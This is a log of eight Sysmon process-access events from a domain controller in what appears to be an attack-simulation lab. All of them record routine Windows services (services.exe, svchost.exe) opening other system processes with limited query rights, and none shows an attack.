{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1272,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.064\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1124\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001054BF0200}\r\nTargetProcessId: 2384\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.064","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"1124","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001054BF0200}","TargetProcessId":"2384","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1273,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.064\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 1124\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010B2FC0200}\r\nTargetProcessId: 3480\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.064","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-00102F530000}","SourceProcessId":"856","SourceThreadId":"1124","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010B2FC0200}","TargetProcessId":"3480","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1274,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1275,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1276,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1277,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1278,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1279,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.080\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.080","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
